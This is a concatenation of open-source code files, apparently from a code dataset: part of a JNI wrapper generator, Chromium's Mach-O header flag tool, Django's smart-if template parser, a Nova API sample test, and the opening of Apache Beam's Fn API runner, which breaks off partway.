retsize not in outparams: outparams.append(retsize) retowned = not self.config_getboolean(name, "retunowned", False) # Input and output parameter code is generated with the help of # "virtual" structures. The input parameters are collected in one # structure, the output parameters in another. Only if there are # multiple output parameters or an output array is the output # structure actually generated into the Java code. instruct_fields = [(pname, ptype, arr, "") for (pname, ptype, arr) in params if pname != "void"] helper = JavaStructEmitHelper(self, name, instruct_fields) helper.config_struct_get = lambda o: "0" # "pointer" type to use for JN/JNI jtype_ptr = java_types_map[("long", None)] jfielddefs_private = [] for fname, ftype, arr, comment in helper.fields: # print(fname, ftype, arr) is_outparam = (fname in outparams) is_nullok = (fname in nullokparams) and not is_outparam if is_outparam: if ftype[-1] == '*': ftype = ftype[:-1] elif arr is None: raise ValueError("outparam %s is not a pointer or array", fname) field = helper.get_field_java_code(fname, ftype, arr, 0, jfielddefs_private, backing="%s_buf" % fname) paramtypes[fname] = (ftype, arr, field["type"]) if is_outparam: jn_funcargs.append((fname, jtype_ptr)) jni_funcargs.append((fname, jtype_ptr)) continue write_bufs = field["write_bufs"] write = field["write"] jtype = field["type"] arr = field["arr"] is_pointer = field["is_pointer"] to_arg = field["to_arg"] # input parameter generation if fname not in size_params: j_funcargs.append((fname, jtype)) # for JN/JNI, force all pointer/arrays to simple "long" type if ftype[-1] == '*' or jtype.string_array: jn_funcargs.append((fname, jtype_ptr)) jni_funcargs.append((fname, jtype_ptr)) else: jn_funcargs.append((fname, jtype)) jni_funcargs.append((fname, jtype)) # determine what to pass and how (e.g. jinit code) if jtype.jni_sig == "[Ljava/lang/String;": raise NotImplementedError("string array") elif jtype.jni_sig[0] == '[': if arr: raise NotImplementedError("sized array") else: jinit.append("{size_jtype} {size_fname} = {fname}.length;".format( size_jtype=field["size_jtype"].j_type, size_fname=field["size_fname"], fname=fname)) jinit.extend("%s = null;" % x for x in write_bufs) jinit.extend(write) jn_passedargs[fname] = to_arg elif jtype.is_enum: jn_passedargs[fname] = to_arg elif jtype.is_opaque: if is_nullok: to_arg = "%s == null ? 0 : %s" % (fname, to_arg) jn_passedargs[fname] = to_arg elif jtype.is_struct: if is_nullok: to_arg = "%s == null ? 0 : %s" % (fname, to_arg) jn_passedargs[fname] = to_arg elif jtype.jni_sig[0] in java_accessor_map: jn_passedargs[fname] = fname elif jtype.jni_sig == "Ljava/lang/String;": if jtype.string_array: jinit.append( "ByteBuffer {fname}_buf = ByteBuffer.allocateDirect({array_size}).order(ByteOrder.nativeOrder());".format( fname=fname, array_size=256)) jinit.extend(field["backing_write"]) jn_passedargs[ fname] = "{fname} == null ? 0 : getByteBufferAddress({fname}_buf)".format( fname=fname) else: jinit.extend("%s = null;" % x for x in write_bufs) jinit.extend(write) jn_passedargs[fname] = to_arg else: raise ValueError("unrecognized jni signature '%s'" % jtype.jni_sig) jrettype = rettype.j_type outstruct_name = None # print(name, jrettype, outparams, retarraysize, retsize) if outparams or retarraysize or retsize: # create a return structure outstruct_fields = [] outstruct_size = [] for (pname, ptype, arr) in params: if pname not in outparams: continue if ptype[-1] == '*': ptype = ptype[:-1] outstruct_fields.append((pname, ptype, arr, "")) if arr: if ptype == "char": outstruct_size.append(arr) else: raise NotImplementedError("non-char array") else: outstruct_size.append("8") outstruct_sized_members = {} outstruct_name = name[4:] + "Result" # create a return buffer (TODO: optimize size) jinit.append( "ByteBuffer rv_buf = ByteBuffer.allocateDirect(%s).order(ByteOrder.nativeOrder());" % "+".join( outstruct_size)) jinit.append("long rv_addr = getByteBufferAddress(rv_buf);") jconstruct_args = [("rv_buf", "ByteBuffer")] jconstruct = [] if retarraysize: jconstruct_args.append(("jn_rv", "long")) jconstruct.append("array_addr = jn_rv;") if retarraysize: outstruct_fields.append(("array", restype, "", "")) outstruct_sized_members["array"] = retarraysize elif functype != "STDFUNC": outstruct_fields.append(("val", restype, None, "")) helper = JavaStructEmitHelper(self, outstruct_name, outstruct_fields, sized_members=outstruct_sized_members) helper.config_struct_get = lambda o: "0" jfielddefs = [] jfielddefs_private = [] off = 0 for fname, ftype, arr, comment in helper.fields: field = helper.get_field_java_code(fname, ftype, arr, off, jfielddefs_private, backing="rv_buf") if fname == retarraysize: jconstruct.append( field["fielddef"].replace("public ", "").replace(fname, "array_%s" % fname)) jconstruct.extend( x.replace(fname, "array_%s" % fname) for x in field["backing_read"]) jn_passedargs[fname] = "rv_addr+%d" % off off += 8 continue jfielddefs.append(field["fielddef"]) if fname == "array": # jconstruct.extend(field["backing_read"]) jconstruct.extend(field["read"]) elif fname != "val": jn_passedargs[fname] = "rv_addr+%d" % off off += 8 jconstruct.extend(field["construct"]) jconstruct.extend(field["backing_read"]) jconstruct.extend(field["read"]) if retarraysize: jfielddefs.append("private long array_addr;") # optimize len(outparams) == 1 case to directly return it. if len(outparams) == 1 and not retarraysize and rettype.j_type == "void": jfini.extend(x.replace("public ", "") for x in jfielddefs) jfini.extend(jconstruct) jretc = "return %s;" % outparams[0] jrettype = paramtypes[outparams[0]][2].j_type # rettype = paramtypes[outparams[0]][2] elif len(outparams) == 1 and retsize: jfini.extend(x.replace("public ", "") for x in jfielddefs) jfini.extend(jconstruct) jfini.append("val = new {type}(jn_rv, {owned}, {size});".format(type=rettype.j_type, owned="true" if retowned else "false", size=retsize)) jretc = "return val;" else: defined.add(outstruct_name) jfini.append("{struct_name} rv = new {struct_name}({args});".format( struct_name=outstruct_name, args=", ".join(x[0] for x in jconstruct_args))) if retsize: jfini.append("rv.val = new {type}(jn_rv, {owned}, rv.{size});".format( type=rettype.j_type, owned="true" if retowned else "false", size=retsize)) elif not retarraysize and functype != "STDFUNC": jfini.append("rv.val = new {type}(jn_rv, {owned});".format(type=rettype.j_type, owned="true" if retowned else "false")) jrettype = outstruct_name if retarraysize: rettype = c_to_jtype(outstruct_name, None) # else: # rettype = java_types_map[("void", None)] print(""" public static class {struct_name} {{ {jfielddefs} private {struct_name}({jconstruct_args}) {{ {jconstruct} }}""".format(struct_name=outstruct_name, jfielddefs="\n ".join(jfielddefs), jconstruct_args=", ".join("%s %s" % (x[1], x[0]) for x in jconstruct_args), jconstruct="\n ".join(jconstruct)), file=self.out) if retarraysize: print(""" @Override protected void finalize() throws Throwable {{ imaqDispose(array_addr); super.finalize(); }} }}""".format(struct_name=outstruct_name), file=self.out) else: print(" }", file=self.out) jretc = "return rv;" elif functype != "STDFUNC": if rettype.is_enum: jretc = "return {type}.fromValue(jn_rv);".format(type=rettype.j_type) elif rettype.is_struct or rettype.is_opaque: jretc = "return new {type}(jn_rv, {owned});".format(type=rettype.j_type, owned="true" if retowned else "false") else: jretc = "return jn_rv;" # # Java function # # assert name.startswith("imaq") # name = name[4].lower() + name[5:] print(""" public static {rettype} {name}({args}) {{ {init} {rv}_{name}({passedargs}); {fini}{retcode} }}""".format(rettype=jrettype, name=name, args=", ".join("%s %s" % (x[1].j_type, x[0]) for x in j_funcargs), init="\n ".join(jinit), fini="\n ".join(jfini), rv="%s jn_rv = " % rettype.jn_type if rettype.jn_type != "void" else "", retcode="\n " + jretc if jretc else "", passedargs=", ".join( jn_passedargs[x[0]] if x[0] in jn_passedargs else "UNKNOWN" for x in jn_funcargs)), file=self.out) # # Native Java function # print(""" private static native {rettype} _{name}({args});""".format( rettype=rettype.jn_type, name=name, args=", ".join("%s %s" % (x[1].jn_type, x[0]) for x in jn_funcargs)), file=self.out) # # C function # print(""" /* J: {jrettype} {name}({jargs}) * JN: {jnrettype} {name}({jnargs}) * C: {restype} {name}({cparams}) */""".format(name=name, jrettype=rettype.j_type, jargs=", ".join("%s %s" % (x[1].j_type, x[0]) for x in j_funcargs), jnrettype=rettype.jn_type, jnargs=", ".join("%s %s" % (x[1].jn_type, x[0]) for x in jn_funcargs), restype=restype, cparams=", ".join("%s %s" % (ptype, pname) for pname, ptype, arr in params)), file=self.outc) cargs = [] for pname, ptype, arr in params: if pname == "void": continue if ptype in structs: cargs.append("*((%s*)%s)" % (ptype, pname)) elif ptype.endswith("String255"): cargs.append("(char *)%s" % pname) elif arr: cargs.append("(%s*)%s" % (ptype, pname)) else: cargs.append("(%s)%s" % (ptype, pname)) callcfunc = "{restype} rv = {name}({args});".format(name=name, restype=restype, args=", ".join(cargs)) print(""" JNIEXPORT {rettype} JNICALL Java_{package}_{classname}__1{name}({args}) {{ {callfunc} {exceptioncheck}{retcode} }}""".format(rettype=rettype.jni_type, package=self.package.replace(".", "_"), classname=self.classname, name=name.replace("_", "_1"), args=", ".join("%s %s" % (x[1].jni_type, x[0]) for x in jni_funcargs), callfunc=callcfunc, exceptioncheck=exceptioncheck, retcode="\n return (%s)rv;" % rettype.jni_type if rettype.jni_type != "void" else ""), file=self.outc) defined.add(name) def struct(self, name, fields): if self.config_getboolean(name, "exclude", fallback=False): return if name in opaque_structs: return defined.add(name) helper = JavaStructEmitHelper(self, name, fields) print(helper.get_java_code(), file=self.out) def union(self, name, fields): self.unions[name] = fields def generate(srcdir, outdir, inputs): emit = None for fname, config_struct_path, configpath, funcs_path in inputs: # read config files config_struct = configparser.ConfigParser() config_struct.read(config_struct_path) config = configparser.ConfigParser() config.read(configpath) block_comment_exclude = set(x.strip() for x in config.get("Block Comment", "exclude").splitlines()) library_funcs = set() with open(funcs_path) as ff: for line in ff: library_funcs.add(line.strip()) # open input file with codecs.open(fname, encoding="utf-8", errors="ignore") as inf: # prescan for undefined structures prescan_file(inf) inf.seek(0) if emit is None: emit = JavaEmitter(outdir, config, config_struct, library_funcs) else: emit.config = config emit.config_struct = config_struct emit.library_funcs = library_funcs # generate parse_file(emit, inf, block_comment_exclude) emit.finish() if __name__ == "__main__": if len(sys.argv) < 5 or ((len(sys.argv) - 1) % 4) != 0: print("Usage: gen_wrap.py <header.h config_struct.ini config.ini funcs.txt>...") exit(0) inputs = [] for i in range(1, len(sys.argv), 4): fname = sys.argv[i] config_struct_name = sys.argv[i + 1] configname = sys.argv[i + 2] funcs_name = sys.argv[i + 3] inputs.append((fname, config_struct_name, configname, funcs_name)) generate("", "", inputs)
bsd-3-clause
XiaosongWei/chromium-crosswalk
build/mac/change_mach_o_flags.py
232
10318
#!/usr/bin/env python # Copyright (c) 2011 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Usage: change_mach_o_flags.py [--executable-heap] [--no-pie] <executablepath> Arranges for the executable at |executable_path| to have its data (heap) pages protected to prevent execution on Mac OS X 10.7 ("Lion"), and to have the PIE (position independent executable) bit set to enable ASLR (address space layout randomization). With --executable-heap or --no-pie, the respective bits are cleared instead of set, making the heap executable or disabling PIE/ASLR. This script is able to operate on thin (single-architecture) Mach-O files and fat (universal, multi-architecture) files. When operating on fat files, it will set or clear the bits for each architecture contained therein. NON-EXECUTABLE HEAP Traditionally in Mac OS X, 32-bit processes did not have data pages set to prohibit execution. Although user programs could call mprotect and mach_vm_protect to deny execution of code in data pages, the kernel would silently ignore such requests without updating the page tables, and the hardware would happily execute code on such pages. 64-bit processes were always given proper hardware protection of data pages. This behavior was controllable on a system-wide level via the vm.allow_data_exec sysctl, which is set by default to 1. The bit with value 1 (set by default) allows code execution on data pages for 32-bit processes, and the bit with value 2 (clear by default) does the same for 64-bit processes. In Mac OS X 10.7, executables can "opt in" to having hardware protection against code execution on data pages applied. This is done by setting a new bit in the |flags| field of an executable's |mach_header|. When MH_NO_HEAP_EXECUTION is set, proper protections will be applied, regardless of the setting of vm.allow_data_exec. See xnu-1699.22.73/osfmk/vm/vm_map.c override_nx and xnu-1699.22.73/bsd/kern/mach_loader.c load_machfile. The Apple toolchain has been revised to set the MH_NO_HEAP_EXECUTION when producing executables, provided that -allow_heap_execute is not specified at link time. Only linkers shipping with Xcode 4.0 and later (ld64-123.2 and later) have this ability. See ld64-123.2.1/src/ld/Options.cpp Options::reconfigureDefaults() and ld64-123.2.1/src/ld/HeaderAndLoadCommands.hpp HeaderAndLoadCommandsAtom<A>::flags(). This script sets the MH_NO_HEAP_EXECUTION bit on Mach-O executables. It is intended for use with executables produced by a linker that predates Apple's modifications to set this bit itself. It is also useful for setting this bit for non-i386 executables, including x86_64 executables. Apple's linker only sets it for 32-bit i386 executables, presumably under the assumption that the value of vm.allow_data_exec is set in stone. However, if someone were to change vm.allow_data_exec to 2 or 3, 64-bit x86_64 executables would run without hardware protection against code execution on data pages. This script can set the bit for x86_64 executables, guaranteeing that they run with appropriate protection even when vm.allow_data_exec has been tampered with. POSITION-INDEPENDENT EXECUTABLES/ADDRESS SPACE LAYOUT RANDOMIZATION This script sets or clears the MH_PIE bit in an executable's Mach-O header, enabling or disabling position independence on Mac OS X 10.5 and later. Processes running position-independent executables have varying levels of ASLR protection depending on the OS release. The main executable's load address, shared library load addresess, and the heap and stack base addresses may be randomized. Position-independent executables are produced by supplying the -pie flag to the linker (or defeated by supplying -no_pie). Executables linked with a deployment target of 10.7 or higher have PIE on by default. This script is never strictly needed during the build to enable PIE, as all linkers used are recent enough to support -pie. However, it's used to disable the PIE bit as needed on already-linked executables. """ import optparse import os import struct import sys # <mach-o/fat.h> FAT_MAGIC = 0xcafebabe FAT_CIGAM = 0xbebafeca # <mach-o/loader.h> MH_MAGIC = 0xfeedface MH_CIGAM = 0xcefaedfe MH_MAGIC_64 = 0xfeedfacf MH_CIGAM_64 = 0xcffaedfe MH_EXECUTE = 0x2 MH_PIE = 0x00200000 MH_NO_HEAP_EXECUTION = 0x01000000 class MachOError(Exception): """A class for exceptions thrown by this module.""" pass def CheckedSeek(file, offset): """Seeks the file-like object at |file| to offset |offset| and raises a MachOError if anything funny happens.""" file.seek(offset, os.SEEK_SET) new_offset = file.tell() if new_offset != offset: raise MachOError, \ 'seek: expected offset %d, observed %d' % (offset, new_offset) def CheckedRead(file, count): """Reads |count| bytes from the file-like |file| object, raising a MachOError if any other number of bytes is read.""" bytes = file.read(count) if len(bytes) != count: raise MachOError, \ 'read: expected length %d, observed %d' % (count, len(bytes)) return bytes def ReadUInt32(file, endian): """Reads an unsinged 32-bit integer from the file-like |file| object, treating it as having endianness specified by |endian| (per the |struct| module), and returns it as a number. Raises a MachOError if the proper length of data can't be read from |file|.""" bytes = CheckedRead(file, 4) (uint32,) = struct.unpack(endian + 'I', bytes) return uint32 def ReadMachHeader(file, endian): """Reads an entire |mach_header| structure (<mach-o/loader.h>) from the file-like |file| object, treating it as having endianness specified by |endian| (per the |struct| module), and returns a 7-tuple of its members as numbers. Raises a MachOError if the proper length of data can't be read from |file|.""" bytes = CheckedRead(file, 28) magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags = \ struct.unpack(endian + '7I', bytes) return magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags def ReadFatArch(file): """Reads an entire |fat_arch| structure (<mach-o/fat.h>) from the file-like |file| object, treating it as having endianness specified by |endian| (per the |struct| module), and returns a 5-tuple of its members as numbers. Raises a MachOError if the proper length of data can't be read from |file|.""" bytes = CheckedRead(file, 20) cputype, cpusubtype, offset, size, align = struct.unpack('>5I', bytes) return cputype, cpusubtype, offset, size, align def WriteUInt32(file, uint32, endian): """Writes |uint32| as an unsinged 32-bit integer to the file-like |file| object, treating it as having endianness specified by |endian| (per the |struct| module).""" bytes = struct.pack(endian + 'I', uint32) assert len(bytes) == 4 file.write(bytes) def HandleMachOFile(file, options, offset=0): """Seeks the file-like |file| object to |offset|, reads its |mach_header|, and rewrites the header's |flags| field if appropriate. The header's endianness is detected. Both 32-bit and 64-bit Mach-O headers are supported (mach_header and mach_header_64). Raises MachOError if used on a header that does not have a known magic number or is not of type MH_EXECUTE. The MH_PIE and MH_NO_HEAP_EXECUTION bits are set or cleared in the |flags| field according to |options| and written to |file| if any changes need to be made. If already set or clear as specified by |options|, nothing is written.""" CheckedSeek(file, offset) magic = ReadUInt32(file, '<') if magic == MH_MAGIC or magic == MH_MAGIC_64: endian = '<' elif magic == MH_CIGAM or magic == MH_CIGAM_64: endian = '>' else: raise MachOError, \ 'Mach-O file at offset %d has illusion of magic' % offset CheckedSeek(file, offset) magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags = \ ReadMachHeader(file, endian) assert magic == MH_MAGIC or magic == MH_MAGIC_64 if filetype != MH_EXECUTE: raise MachOError, \ 'Mach-O file at offset %d is type 0x%x, expected MH_EXECUTE' % \ (offset, filetype) original_flags = flags if options.no_heap_execution: flags |= MH_NO_HEAP_EXECUTION else: flags &= ~MH_NO_HEAP_EXECUTION if options.pie: flags |= MH_PIE else: flags &= ~MH_PIE if flags != original_flags: CheckedSeek(file, offset + 24) WriteUInt32(file, flags, endian) def HandleFatFile(file, options, fat_offset=0): """Seeks the file-like |file| object to |offset| and loops over its |fat_header| entries, calling HandleMachOFile for each.""" CheckedSeek(file, fat_offset) magic = ReadUInt32(file, '>') assert magic == FAT_MAGIC nfat_arch = ReadUInt32(file, '>') for index in xrange(0, nfat_arch): cputype, cpusubtype, offset, size, align = ReadFatArch(file) assert size >= 28 # HandleMachOFile will seek around. Come back here after calling it, in # case it sought. fat_arch_offset = file.tell() HandleMachOFile(file, options, offset) CheckedSeek(file, fat_arch_offset) def main(me, args): parser = optparse.OptionParser('%prog [options] <executable_path>') parser.add_option('--executable-heap', action='store_false', dest='no_heap_execution', default=True, help='Clear the MH_NO_HEAP_EXECUTION bit') parser.add_option('--no-pie', action='store_false', dest='pie', default=True, help='Clear the MH_PIE bit') (options, loose_args) = parser.parse_args(args) if len(loose_args) != 1: parser.print_usage() return 1 executable_path = loose_args[0] executable_file = open(executable_path, 'rb+') magic = ReadUInt32(executable_file, '<') if magic == FAT_CIGAM: # Check FAT_CIGAM and not FAT_MAGIC because the read was little-endian. HandleFatFile(executable_file, options) elif magic == MH_MAGIC or magic == MH_CIGAM or \ magic == MH_MAGIC_64 or magic == MH_CIGAM_64: HandleMachOFile(executable_file, options) else: raise MachOError, '%s is not a Mach-O or fat file' % executable_file executable_file.close() return 0 if __name__ == '__main__': sys.exit(main(sys.argv[0], sys.argv[1:]))
bsd-3-clause
tmpgit/intellij-community
python/lib/Lib/site-packages/django/template/smartif.py
331
6261
""" Parser and utilities for the smart 'if' tag """ import operator # Using a simple top down parser, as described here: # http://effbot.org/zone/simple-top-down-parsing.htm. # 'led' = left denotation # 'nud' = null denotation # 'bp' = binding power (left = lbp, right = rbp) class TokenBase(object): """ Base class for operators and literals, mainly for debugging and for throwing syntax errors. """ id = None # node/token type name value = None # used by literals first = second = None # used by tree nodes def nud(self, parser): # Null denotation - called in prefix context raise parser.error_class( "Not expecting '%s' in this position in if tag." % self.id ) def led(self, left, parser): # Left denotation - called in infix context raise parser.error_class( "Not expecting '%s' as infix operator in if tag." % self.id ) def display(self): """ Returns what to display in error messages for this node """ return self.id def __repr__(self): out = [str(x) for x in [self.id, self.first, self.second] if x is not None] return "(" + " ".join(out) + ")" def infix(bp, func): """ Creates an infix operator, given a binding power and a function that evaluates the node """ class Operator(TokenBase): lbp = bp def led(self, left, parser): self.first = left self.second = parser.expression(bp) return self def eval(self, context): try: return func(context, self.first, self.second) except Exception: # Templates shouldn't throw exceptions when rendering. We are # most likely to get exceptions for things like {% if foo in bar # %} where 'bar' does not support 'in', so default to False return False return Operator def prefix(bp, func): """ Creates a prefix operator, given a binding power and a function that evaluates the node. """ class Operator(TokenBase): lbp = bp def nud(self, parser): self.first = parser.expression(bp) self.second = None return self def eval(self, context): try: return func(context, self.first) except Exception: return False return Operator # Operator precedence follows Python. # NB - we can get slightly more accurate syntax error messages by not using the # same object for '==' and '='. # We defer variable evaluation to the lambda to ensure that terms are # lazily evaluated using Python's boolean parsing logic. OPERATORS = { 'or': infix(6, lambda context, x, y: x.eval(context) or y.eval(context)), 'and': infix(7, lambda context, x, y: x.eval(context) and y.eval(context)), 'not': prefix(8, lambda context, x: not x.eval(context)), 'in': infix(9, lambda context, x, y: x.eval(context) in y.eval(context)), 'not in': infix(9, lambda context, x, y: x.eval(context) not in y.eval(context)), '=': infix(10, lambda context, x, y: x.eval(context) == y.eval(context)), '==': infix(10, lambda context, x, y: x.eval(context) == y.eval(context)), '!=': infix(10, lambda context, x, y: x.eval(context) != y.eval(context)), '>': infix(10, lambda context, x, y: x.eval(context) > y.eval(context)), '>=': infix(10, lambda context, x, y: x.eval(context) >= y.eval(context)), '<': infix(10, lambda context, x, y: x.eval(context) < y.eval(context)), '<=': infix(10, lambda context, x, y: x.eval(context) <= y.eval(context)), } # Assign 'id' to each: for key, op in OPERATORS.items(): op.id = key class Literal(TokenBase): """ A basic self-resolvable object similar to a Django template variable. """ # IfParser uses Literal in create_var, but TemplateIfParser overrides # create_var so that a proper implementation that actually resolves # variables, filters etc is used. id = "literal" lbp = 0 def __init__(self, value): self.value = value def display(self): return repr(self.value) def nud(self, parser): return self def eval(self, context): return self.value def __repr__(self): return "(%s %r)" % (self.id, self.value) class EndToken(TokenBase): lbp = 0 def nud(self, parser): raise parser.error_class("Unexpected end of expression in if tag.") EndToken = EndToken() class IfParser(object): error_class = ValueError def __init__(self, tokens): # pre-pass necessary to turn 'not','in' into single token l = len(tokens) mapped_tokens = [] i = 0 while i < l: token = tokens[i] if token == "not" and i + 1 < l and tokens[i+1] == "in": token = "not in" i += 1 # skip 'in' mapped_tokens.append(self.translate_token(token)) i += 1 self.tokens = mapped_tokens self.pos = 0 self.current_token = self.next() def translate_token(self, token): try: op = OPERATORS[token] except (KeyError, TypeError): return self.create_var(token) else: return op() def next(self): if self.pos >= len(self.tokens): return EndToken else: retval = self.tokens[self.pos] self.pos += 1 return retval def parse(self): retval = self.expression() # Check that we have exhausted all the tokens if self.current_token is not EndToken: raise self.error_class("Unused '%s' at end of if expression." % self.current_token.display()) return retval def expression(self, rbp=0): t = self.current_token self.current_token = self.next() left = t.nud(self) while rbp < self.current_token.lbp: t = self.current_token self.current_token = self.next() left = t.led(left, self) return left def create_var(self, value): return Literal(value)
apache-2.0
tealover/nova
nova/tests/functional/v3/test_extended_volumes.py
24
4504
# Copyright 2012 Nebula, Inc. # Copyright 2013 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from nova.compute import api as compute_api from nova import db from nova.tests.functional.v3 import test_servers from nova.tests.unit.api.openstack import fakes from nova.tests.unit import fake_block_device from nova.tests.unit import fake_instance CONF = cfg.CONF CONF.import_opt('osapi_compute_extension', 'nova.api.openstack.compute.extensions') class ExtendedVolumesSampleJsonTests(test_servers.ServersSampleBase): extension_name = "os-extended-volumes" extra_extensions_to_load = ["os-access-ips"] # TODO(park): Overriding '_api_version' till all functional tests # are merged between v2 and v2.1. After that base class variable # itself can be changed to 'v2' _api_version = 'v2' def _get_flags(self): f = super(ExtendedVolumesSampleJsonTests, self)._get_flags() f['osapi_compute_extension'] = CONF.osapi_compute_extension[:] f['osapi_compute_extension'].append( 'nova.api.openstack.compute.contrib.extended_volumes.' 'Extended_volumes') f['osapi_compute_extension'].append( 'nova.api.openstack.compute.contrib.keypairs.' 'Keypairs') f['osapi_compute_extension'].append( 'nova.api.openstack.compute.contrib.extended_ips_mac.' 'Extended_ips_mac') f['osapi_compute_extension'].append( 'nova.api.openstack.compute.contrib.extended_ips.' 'Extended_ips') return f def _stub_compute_api_get_instance_bdms(self, server_id): def fake_bdms_get_all_by_instance(context, instance_uuid, use_slave=False): bdms = [ fake_block_device.FakeDbBlockDeviceDict( {'id': 1, 'volume_id': 'a26887c6-c47b-4654-abb5-dfadf7d3f803', 'instance_uuid': server_id, 'source_type': 'volume', 'destination_type': 'volume', 'device_name': '/dev/sdd'}), fake_block_device.FakeDbBlockDeviceDict( {'id': 2, 'volume_id': 'a26887c6-c47b-4654-abb5-dfadf7d3f804', 'instance_uuid': server_id, 'source_type': 'volume', 'destination_type': 'volume', 'device_name': '/dev/sdc'}) ] return bdms self.stubs.Set(db, 'block_device_mapping_get_all_by_instance', fake_bdms_get_all_by_instance) def _stub_compute_api_get(self): def fake_compute_api_get(self, context, instance_id, **kwargs): want_objects = kwargs.get('want_objects') if want_objects: return fake_instance.fake_instance_obj( context, **{'uuid': instance_id}) else: return {'uuid': instance_id} self.stubs.Set(compute_api.API, 'get', fake_compute_api_get) def test_show(self): uuid = self._post_server() self.stubs.Set(db, 'block_device_mapping_get_all_by_instance', fakes.stub_bdm_get_all_by_instance) response = self._do_get('servers/%s' % uuid) subs = self._get_regexes() subs['hostid'] = '[a-f0-9]+' subs['access_ip_v4'] = '1.2.3.4' subs['access_ip_v6'] = '80fe::' self._verify_response('server-get-resp', subs, response, 200) def test_detail(self): uuid = self._post_server() self.stubs.Set(db, 'block_device_mapping_get_all_by_instance', fakes.stub_bdm_get_all_by_instance) response = self._do_get('servers/detail') subs = self._get_regexes() subs['id'] = uuid subs['hostid'] = '[a-f0-9]+' subs['access_ip_v4'] = '1.2.3.4' subs['access_ip_v6'] = '80fe::' self._verify_response('servers-detail-resp', subs, response, 200)
apache-2.0
dhalperi/incubator-beam
sdks/python/apache_beam/runners/portability/fn_api_runner.py
2
17798
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """A PipelineRunner using the SDK harness. """ import collections import json import logging import Queue as queue import threading import grpc from concurrent import futures import apache_beam as beam from apache_beam.coders import WindowedValueCoder from apache_beam.coders.coder_impl import create_InputStream from apache_beam.coders.coder_impl import create_OutputStream from apache_beam.internal import pickler from apache_beam.io import iobase from apache_beam.transforms.window import GlobalWindows from apache_beam.runners.api import beam_fn_api_pb2 from apache_beam.runners.portability import maptask_executor_runner from apache_beam.runners.worker import data_plane from apache_beam.runners.worker import operation_specs from apache_beam.runners.worker import sdk_worker # This module is experimental. No backwards-compatibility guarantees. def streaming_rpc_handler(cls, method_name): """Un-inverts the flow of control between the runner and the sdk harness.""" class StreamingRpcHandler(cls): _DONE = object() def __init__(self): self._push_queue = queue.Queue() self._pull_queue = queue.Queue() setattr(self, method_name, self.run) self._read_thread = threading.Thread(target=self._read) def run(self, iterator, context): self._inputs = iterator # Note: We only support one client for now. self._read_thread.start() while True: to_push = self._push_queue.get() if to_push is self._DONE: return yield to_push def _read(self): for data in self._inputs: self._pull_queue.put(data) def push(self, item): self._push_queue.put(item) def pull(self, timeout=None): return self._pull_queue.get(timeout=timeout) def empty(self): return self._pull_queue.empty() def done(self): self.push(self._DONE) self._read_thread.join() return StreamingRpcHandler() class OldeSourceSplittableDoFn(beam.DoFn): """A DoFn that reads and emits an entire source. """ # TODO(robertwb): Make this a full SDF with progress splitting, etc. def process(self, source): if isinstance(source, iobase.SourceBundle): for value in source.source.read(source.source.get_range_tracker( source.start_position, source.stop_position)): yield value else: # Dataflow native source with source.reader() as reader: for value in reader: yield value # See DataflowRunner._pardo_fn_data OLDE_SOURCE_SPLITTABLE_DOFN_DATA = pickler.dumps( (OldeSourceSplittableDoFn(), (), {}, [], beam.transforms.core.Windowing(GlobalWindows()))) class FnApiRunner(maptask_executor_runner.MapTaskExecutorRunner): def __init__(self): super(FnApiRunner, self).__init__() self._last_uid = -1 def has_metrics_support(self): return False def _next_uid(self): self._last_uid += 1 return str(self._last_uid) def _map_task_registration(self, map_task, state_handler, data_operation_spec): input_data = {} runner_sinks = {} transforms = [] transform_index_to_id = {} # Maps coders to new coder objects and references. coders = {} def coder_id(coder): if coder not in coders: coders[coder] = beam_fn_api_pb2.Coder( function_spec=sdk_worker.pack_function_spec_data( json.dumps(coder.as_cloud_object()), sdk_worker.PYTHON_CODER_URN, id=self._next_uid())) return coders[coder].function_spec.id def output_tags(op): return getattr(op, 'output_tags', ['out']) def as_target(op_input): input_op_index, input_output_index = op_input input_op = map_task[input_op_index][1] return { 'ignored_input_tag': beam_fn_api_pb2.Target.List(target=[ beam_fn_api_pb2.Target( primitive_transform_reference=transform_index_to_id[ input_op_index], name=output_tags(input_op)[input_output_index]) ]) } def outputs(op): return { tag: beam_fn_api_pb2.PCollection(coder_reference=coder_id(coder)) for tag, coder in zip(output_tags(op), op.output_coders) } for op_ix, (stage_name, operation) in enumerate(map_task): transform_id = transform_index_to_id[op_ix] = self._next_uid() if isinstance(operation, operation_specs.WorkerInMemoryWrite): # Write this data back to the runner. fn = beam_fn_api_pb2.FunctionSpec(urn=sdk_worker.DATA_OUTPUT_URN, id=self._next_uid()) if data_operation_spec: fn.data.Pack(data_operation_spec) inputs = as_target(operation.input) side_inputs = {} runner_sinks[(transform_id, 'out')] = operation elif isinstance(operation, operation_specs.WorkerRead): # A Read is either translated to a direct injection of windowed values # into the sdk worker, or an injection of the source object into the # sdk worker as data followed by an SDF that reads that source. if (isinstance(operation.source.source, worker_runner_base.InMemorySource) and isinstance(operation.source.source.default_output_coder(), WindowedValueCoder)): output_stream = create_OutputStream() element_coder = ( operation.source.source.default_output_coder().get_impl()) # Re-encode the elements in the nested context and # concatenate them together for element in operation.source.source.read(None): element_coder.encode_to_stream(element, output_stream, True) target_name = self._next_uid() input_data[(transform_id, target_name)] = output_stream.get() fn = beam_fn_api_pb2.FunctionSpec(urn=sdk_worker.DATA_INPUT_URN, id=self._next_uid()) if data_operation_spec: fn.data.Pack(data_operation_spec) inputs = {target_name: 